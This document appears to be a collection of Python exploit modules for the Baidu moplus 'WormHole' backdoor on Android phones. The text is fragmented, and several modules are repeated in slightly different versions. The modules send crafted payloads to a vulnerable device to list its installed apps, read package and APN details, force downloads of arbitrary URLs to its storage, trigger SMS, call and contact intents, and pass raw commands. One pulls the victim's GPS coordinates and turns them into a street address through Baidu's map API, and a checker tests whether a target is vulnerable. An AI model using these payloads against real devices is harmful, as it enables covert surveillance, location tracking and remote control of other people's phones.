获取安装程序列表 ''', } payload = "getapplist?mcmdf=inapp_&callback=t" options = AttribDict() def callback(self, arg): _, res = arg if _: self.ui.notify.success('Get success!') # parse json try: data = json.loads(res[7:-2]) packages = data['package_infos'] self.ui.table( 'Found (%d) app..' % len(packages), [45, 31], ['PACKAGE_NAME', 'VERSION_NAME'], [[p['package_name'], p['version_name']] for p in packages] ) cache.getapplist = [p['package_name'] for p in packages] except Exception, e: self.ui.notify.error('(PARSE JSON) -> %s' % e) else: self.ui.notify.error('Get fail (%s)!' % res) register(GetApplist)
set URL http://xxx.com/a.apk set SAVE_PATH downloads/ 就会把 xxx.com/a.apk 文件下载到 /sdcard/downloads/ 目录下 ''', } payload = "downloadfile?querydown=download&downloadurl={self.options.URL}&savepath" \ "={self.options.SAVE_PATH}&filesize=1024&callback=t&mcmdf=inapp_" options = AttribDict() options.URL = ['http://', 'https://', 'ftp://', 'file://'] options.SAVE_PATH = "." def callback(self, arg): _, res = arg if _: if res == 't && t({"error":0});': self.ui.notify.success('Download success!').info( 'Save in /sdcard/%s%s' % (self.options.SAVE_PATH, self.options.URL.split('/')[-1])) else: self.ui.notify.error('Download fail (%s)!' % res) else: self.ui.notify.error('Download fail (%s)!' % res) register(DownloadFile)
PACKAGENAME: 要获取的包名 eg: set PACKAGENAME com.android.browser """, } payload = "getpackageinfo?packagename={self.options.PACKAGENAME}&mcmdf=inapp_&callback=t" options = AttribDict() options.PACKAGENAME = cache.getapplist if cache.has_key("getapplist") else [] def callback(self, arg): _, res = arg if _: info = json.loads(res[7:-2]) if len(info) > 0: self.ui.notify.info("Get success!").table( "App Info...", [21, 21], ["Options", "Info"], [[p, info.get("package_infos")[0].get(p)] for p in info.get("package_infos")[0].keys()], ) else: self.ui.notify.error("Get fail (%s)!" % res) else: self.ui.notify.error("Get fail (%s)!" % res) register(PackageInfo)
ui = UI() info = { "Author": "Medici.Yan", "Description": u''' 获取本地字符串 ''', } payload = "getlocstring?mcmdf=inapp_&callback=t" options = AttribDict() def callback(self, arg): _, res = arg print arg if _: data = json.loads(res[7:-2]) if len(data) > 0: self.ui.notify.info('Get success!').success( data.get('locstring')) else: self.ui.notify.error('Get fail (%s)!' % res) else: self.ui.notify.error('Get fail (%s)!' % res) register(Getlocstring)
PACKAGENAME: 要获取的包名 eg: set PACKAGENAME com.android.browser ''', } payload = "getpackageinfo?packagename={self.options.PACKAGENAME}&mcmdf=inapp_&callback=t" options = AttribDict() options.PACKAGENAME = cache.getapplist if cache.has_key('getapplist') else [] def callback(self, arg): _, res = arg if _: info = json.loads(res[7:-2]) if len(info) > 0: self.ui.notify.info('Get success!').table( 'App Info...', [21, 21], ['Options', 'Info'], [[p, info.get('package_infos')[0].get(p)] for p in info.get('package_infos')[0].keys()] ) else: self.ui.notify.error('Get fail (%s)!' % res) else: self.ui.notify.error('Get fail (%s)!' % res) register(PackageInfo)
set SAVE_PATH downloads/ 就会把 xxx.com/a.apk 文件下载到 /sdcard/downloads/ 目录下 """, } payload = ( "downloadfile?querydown=download&downloadurl={self.options.URL}&savepath" "={self.options.SAVE_PATH}&filesize=1024&callback=t&mcmdf=inapp_" ) options = AttribDict() options.URL = ["http://", "https://", "ftp://", "file://"] options.SAVE_PATH = "." def callback(self, arg): _, res = arg if _: if res == 't && t({"error":0});': self.ui.notify.success("Download success!").info( "Save in /sdcard/%s%s" % (self.options.SAVE_PATH, self.options.URL.split("/")[-1]) ) else: self.ui.notify.error("Download fail (%s)!" % res) else: self.ui.notify.error("Download fail (%s)!" % res) register(DownloadFile)
try: data = json.loads(data) self.ui.notify.info('Get success!') if data.has_key('coords'): info = data['coords'] # print ([p, info.get(p)] for p in info.keys()) self.ui.table(u'目标地理位置', [20, 21], ['Options', 'Info'], [ [u'citycode', data['citycode']], [u'longitude', info['longitude']], [u'latitude', info['latitude']], [u'accuracy', info['accuracy']], ]) location_api = "http://api.map.baidu.com/?qt=rgc&x={longitude}&y={latitude}&" \ "dis_poi=1&fromproduct=jsapi&res=api".format( longitude=info['longitude'], latitude=info["latitude"] ) req = urllib2.Request(location_api) resp = urllib2.urlopen(req) lodata = json.loads(resp.read()) if lodata: self.ui.success(lodata["content"]["address"]).success( lodata["content"]["poi_desc"]) except: self.ui.error('Error!') else: self.ui.error('Error!') register(Geolocation)
def __init__(self): pass ui = UI() info = { "Author": "Medici.Yan", "Description": u''' 发送原始字串注意拼接字符串 set RAW sendintent?intent=sms:110& payload = "{self.options.RAW}mcmdf=inapp_&callback=t" ''', } payload = "{self.options.RAW}mcmdf=inapp_&callback=t" options = AttribDict() options.RAW = "" def callback(self, arg): if arg[0]: self.ui.success('Success!') else: self.ui.error('Error!') self.ui.p(arg[1], self.ui.GREEN) register(RawReq)
# coding:utf-8 from libs.core.register import register from libs.core.attrdict import AttribDict from libs.ui import UI class GetApn(): ui = UI() info = { "Author":"Medici.Yan", "Description": u''' 获取 apn ''', } payload = "getapn?mcmdf=inapp_&callback=t" options = AttribDict() def callback(self, arg): if arg[0]: self.ui.notify.info('Get success!').success(arg[1][8:-13]) else: self.ui.error('Error!') register(GetApn)
self.ui.notify.info('Get success!') if data.has_key('coords'): info = data['coords'] # print ([p, info.get(p)] for p in info.keys()) self.ui.table( u'目标地理位置', [20, 21], ['Options', 'Info'], [ [u'citycode', data['citycode']], [u'longitude', info['longitude']], [u'latitude', info['latitude']], [u'accuracy', info['accuracy']], ]) location_api = "http://api.map.baidu.com/?qt=rgc&x={longitude}&y={latitude}&" \ "dis_poi=1&fromproduct=jsapi&res=api".format( longitude=info['longitude'], latitude=info["latitude"] ) req = urllib2.Request(location_api) resp = urllib2.urlopen(req) lodata = json.loads(resp.read()) if lodata: self.ui.success(lodata["content"]["address"]).success(lodata["content"]["poi_desc"]) except: self.ui.error('Error!') else: self.ui.error('Error!') register(Geolocation)
def callback(self, arg): _, res = arg if _: info = json.loads(res[7:-2]) if len(info) > 0: info_keys = info.keys() info_keys.remove('error') data = info.get(info_keys[0]) self.ui.notify.info('Get success!') if hasattr(data, '__iter__'): if self.options.INFOTYPE == "getapplist": self.ui.table( 'Found (%d) app..' % len(data), [45, 31], ['PACKAGE_NAME', 'VERSION_NAME'], [[p['package_name'], p['version_name']] for p in data] ) cache.getapplist = [p['package_name'] for p in data] else: self.ui.success(info.get(info_keys[0])) else: self.ui.notify.error('Get fail (%s)!' % res) else: self.ui.notify.error('Get fail (%s)!' % res) register(GetInfo)
ui = UI() info = { "Author": "Medici.Yan", "Description": u''' 获取本地字符串 ''', } payload = "getlocstring?mcmdf=inapp_&callback=t" options = AttribDict() def callback(self, arg): _, res = arg print arg if _: data = json.loads(res[7:-2]) if len(data) > 0: self.ui.notify.info('Get success!').success(data.get('locstring')) else: self.ui.notify.error('Get fail (%s)!' % res) else: self.ui.notify.error('Get fail (%s)!' % res) register(Getlocstring)
"Description": u''' 获取安装程序列表 ''', } payload = "getapplist?mcmdf=inapp_&callback=t" options = AttribDict() def callback(self, arg): _, res = arg if _: self.ui.notify.success('Get success!') # parse json try: data = json.loads(res[7:-2]) packages = data['package_infos'] self.ui.table('Found (%d) app..' % len(packages), [45, 31], ['PACKAGE_NAME', 'VERSION_NAME'], [[p['package_name'], p['version_name']] for p in packages]) cache.getapplist = [p['package_name'] for p in packages] except Exception, e: self.ui.notify.error('(PARSE JSON) -> %s' % e) else: self.ui.notify.error('Get fail (%s)!' % res) register(GetApplist)
file:// 打开本地文件 mailto: 发送邮件 content://contacts/people/1 查看编号为 1 的用户名片 其它的自行补充 ''', } payload = "sendintent?intent={self.options.INTENT}&mcmdf=inapp_&callback=t" options = AttribDict() options.INTENT = [ 'sms:', 'tel:', 'geo:', 'smsto:', 'http://', 'file://', 'mailto:', 'content://contacts/people/', ] def callback(self, arg): if arg[0]: self.ui.success('Success!') else: self.ui.error('Error!') register(SendIntent)
其它的自行补充 ''', } payload = "sendintent?intent={self.options.INTENT}&mcmdf=inapp_&callback=t" options = AttribDict() options.INTENT = [ 'sms:', 'tel:', 'geo:', 'smsto:', 'http://', 'file://', 'mailto:', 'weixin://', 'content://contacts/people/', 'market://details?id=', 'market://search?q=', ] def callback(self, arg): if arg[0]: self.ui.success('Success!') else: self.ui.error('Error!') register(SendIntent)
# coding:utf-8 from libs.core.register import register from libs.core.attrdict import AttribDict from libs.ui import UI class Check(): ui = UI() # 关于这个 Poc 的一些信息 info = { "Author":"Medici.Yan", "Description": u''' 检查 moplus WormHole ''', } # 要发送的 payload payload = "getserviceinfo?mcmdf=inapp_&callback=t" # options 是要手动设置的参数 options = AttribDict() def callback(self, arg): '''回调函数''' _, msg = arg if _ and 'packagename":"com.baidu.' in msg: self.ui.notify.success('Target is vulnerable!') else: self.ui.notify.error('Target is not vulnerable!') # 注册 register(Check)
from libs.core.attrdict import AttribDict from libs.ui import UI class Check(): ui = UI() # 关于这个 Poc 的一些信息 info = { "Author": "Medici.Yan", "Description": u''' 检查 moplus WormHole ''', } # 要发送的 payload payload = "getserviceinfo?mcmdf=inapp_&callback=t" # options 是要手动设置的参数 options = AttribDict() def callback(self, arg): '''回调函数''' _, msg = arg if _ and 'packagename":"com.baidu.' in msg: self.ui.notify.success('Target is vulnerable!') else: self.ui.notify.error('Target is not vulnerable!') # 注册 register(Check)